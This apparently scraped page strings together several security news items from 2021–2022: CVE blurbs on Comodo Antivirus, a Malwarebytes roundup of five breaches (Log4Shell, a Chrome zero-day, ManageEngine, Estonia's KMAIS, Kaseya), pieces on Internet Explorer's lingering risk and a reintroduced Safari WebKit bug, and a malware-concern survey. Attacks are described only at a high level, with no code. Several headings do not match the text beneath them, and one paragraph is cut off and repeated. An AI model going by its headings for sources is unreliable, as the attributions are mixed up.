CVE-2022-27871: Security Advisories | Autodesk Trust Center

Comodo Antivirus 12.2.2.8012 has a quarantine flaw that allows privilege escalation. To escalate privilege, a low-privileged attacker can use an NTFS directory junction to restore a malicious DLL from quarantine into the System32 folder.

CVE-2022-34008: Download Free Antivirus Software | Get Complete PC Virus Protection

In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses.
The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

**1.   APT41 exploits Log4Shell vulnerability to compromise at least two US state governments**

First publicly announced in early December 2021, Log4shell (CVE-2021-44228) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

**2.  North Korean government backed-groups exploit Chrome zero-day vulnerability**

On February 10 2022, Google’s Threat Analysis Group (TAG) discovered that two North Korean government backed-groups exploited a vulnerability (**CVE-2022-0609**) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

**3.  Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability**

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability **(CVE-20****2****1-40539)** in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploited this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

**4.  Tallinn-based hacker exploits Estonian government platform security vulnerabilities**

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

**5.  Russian hackers exploit Kaseya security vulnerabilities**

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya’s web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

**Organizations need a streamlined approach to vulnerability assessment**

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

Security vulnerabilities: 5 times that organizations got hacked

Microsoft's legacy browser may be dead—but its remnants are not going anywhere, and neither are its lingering security risks.

After years of decline and a final wind-down over the past 13 months, on Wednesday Microsoft confirmed the retirement of Internet Explorer, the company’s long-lived and increasingly notorious web browser. Launched in 1995, IE came preinstalled on Windows computers for almost two decades, and like Windows XP, Internet Explorer became a mainstay—to the point that when it was time for users to upgrade and move on, they often didn’t. And while last week’s milestone will push even more users off the historic browser, security researchers emphasize that IE and its many security vulnerabilities are far from gone.

In the coming months, Microsoft will disable the IE app on Windows 10 devices, guiding users instead to its next-generation Edge browser, first released in 2015. The IE icon will still remain on users’ desktops, though, and Edge incorporates a service called “IE mode” to preserve access to old websites built for Internet Explorer. Microsoft says it will support IE mode through at least 2029. Additionally, IE will still work for now on all supported versions of Windows 8.1, Windows 7 with Microsoft’s Extended Security Updates, and Windows Server, though the company says it will eventually phase IE out in these, too.  

Seven years after the debut of Edge, industry analysis indicates that Internet Explorer may still hold more than half a percent of the total global browser market share. And in the United States, that share may be closer to as much as 2 percent.

“I do think we’ve made progress, and we probably won’t see as many exploits against IE in the future, but we will still have remnants of Internet Explorer for a long time that scammers can take advantage of,” says Ronnie Tokazowski, a longtime independent malware researcher. “Internet Explorer as the browser will be gone, but there are still pieces that exist.”

For something that’s been around as long as IE, backward compatibility is difficult to balance with the desire for a clean slate. “We haven’t forgotten that some parts of the web still rely on Internet Explorer’s specific behaviors and features,” Sean Lyndersay, the general manager of Microsoft Edge Enterprise, wrote in an IE retrospective on Wednesday, pointing to IE mode.

But he added that there was a real need to start over with Edge rather than trying to salvage IE. “The web has evolved and so have browsers,” he wrote last week. “Incremental improvements to Internet Explorer couldn’t match the general improvements to the web at large, so we started fresh.”

Microsoft says it will still support IE’s underlying browser engine, known as “MSHTML,” and it has its eye on versions of Windows still “used in critical environments.” But Maddie Stone, a researcher for Google’s Project Zero vulnerability hunting team, points out that hackers are still exploiting IE vulnerabilities in real-world attacks.

“Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked, even though Internet Explorer’s market share of web browser users continues to decrease,” she wrote in April, referring to previously unknown vulnerabilities, called zero-days. “Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their internet browser."

In her analysis, Stone particularly noted that while the number of new IE vulnerabilities Project Zero has detected has remained fairly constant, attackers have shifted over the years to increasingly target the MSHTML browser engine through malicious files like tainted Office documents. This could mean that neutering the IE application won’t immediately change attack trends that are already in motion.

Given how difficult it has been to rein in Internet Explorer at all, Microsoft and IE users around the world have certainly come a long way. But for a browser that’s supposed to be dead, IE still very much loads with the living.

The Ghost of Internet Explorer Will Haunt the Web for Years

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.
The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.

The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.

In early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it "may have been actively exploited."

"In this case, the variant was completely patched when the vulnerability was initially reported in 2013," Maddie Stone of Google Project Zero said. "However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022."

While both the 2013 and 2022 bugs in the History API are essentially the same, the paths to trigger the vulnerability are different. Then subsequent code changes undertaken years later revived the zero-day flaw from the dead like a "zombie."

Stating the incident is not unique to Safari, Stone further stressed taking adequate time to audit code and patches to avoid instances of duplicating the fixes and understanding the security impacts of the changes being carried out.

"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions," Stone noted.

"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild

Security teams —  who are already fighting off malware challenges — are also facing renewed attacks on cloud assets and remote systems.

Big picture, security professionals worry about how to defend their organizations against increasingly sophisticated attacks exploiting zero-day vulnerabilities or nation-state attackers, but their day-to-day security concerns appear to be far more prosaic. According to Dark Reading's "The State of Malware Threats" report, ransomware and phishing attacks are top-of-mind for security professionals.

When asked which type of attacks worried them most, 61% of IT security professionals cited ransomware, followed by 54% for phishing attacks. These statistics are significantly higher than last year's survey, where 41% said they were concerned about ransomware and 31% about phishing attacks.

Ransomware attacks are on the rise, and they are increasingly expensive. Even if an organization doesn't paying the ransom, the recovery cost is high, and there is the risk that the attackers might dump sensitive data online. Phishing is also another big concern, as that tactic is used in pretty much every kind of attack to download malware onto user machines or to steal information and credentials.

Even as more employees return to the office in the wake of the COVID-19 pandemic, the changes that two years of remote work wrought on business operations remain intact. Cloud implementation, which was already rising back in 2019, accelerated even more than predicted.

The increased reliance on the cloud may be why 27% of IT security professionals cited attacks on cloud systems and services as most worrisome.

Some threats may be of heightened concern due to highly publicized breaches. The 2019 SolarWinds attack, for one, kicked off what the report calls "a new wave of breach-once-compromise-many attacks via the software supply chain." Add in the July 2021 Kaseya ransomware kerfuffle, and it's easy to see why concern about malware and other compromises triggered by suppliers or other trading partners hit 20% in 2022, compared with 14% in 2021. Incidents such as the Microsoft Exchange Server exploit in March 2021 truly unnerved security professionals: Concerns and vulnerabilities in applications and operating systems more than doubled, from 11% in 2021 to 29% in 2022.

Polymorphic fileless malware was cited as another area of concern for 24% of respondents, up from 14% last year. This type of malware modifies functions and processes without needing to be a standalone file, which makes it difficult to detect. Cross-platform malware such as Hajime (a new category in the survey, which 7% of respondents cited) often targets Internet of Things (IoT) devices, an attack vector whose profile doubled, from 12% in the 2021 survey to 24% in 2022.

Surprisingly, concern about malware that uses artificial intelligence stayed nearly flat, rising only 1% to 18% this year. That's still a well-recognized threat, but it's interesting that fear around it has cooled.

Tag

#zero_day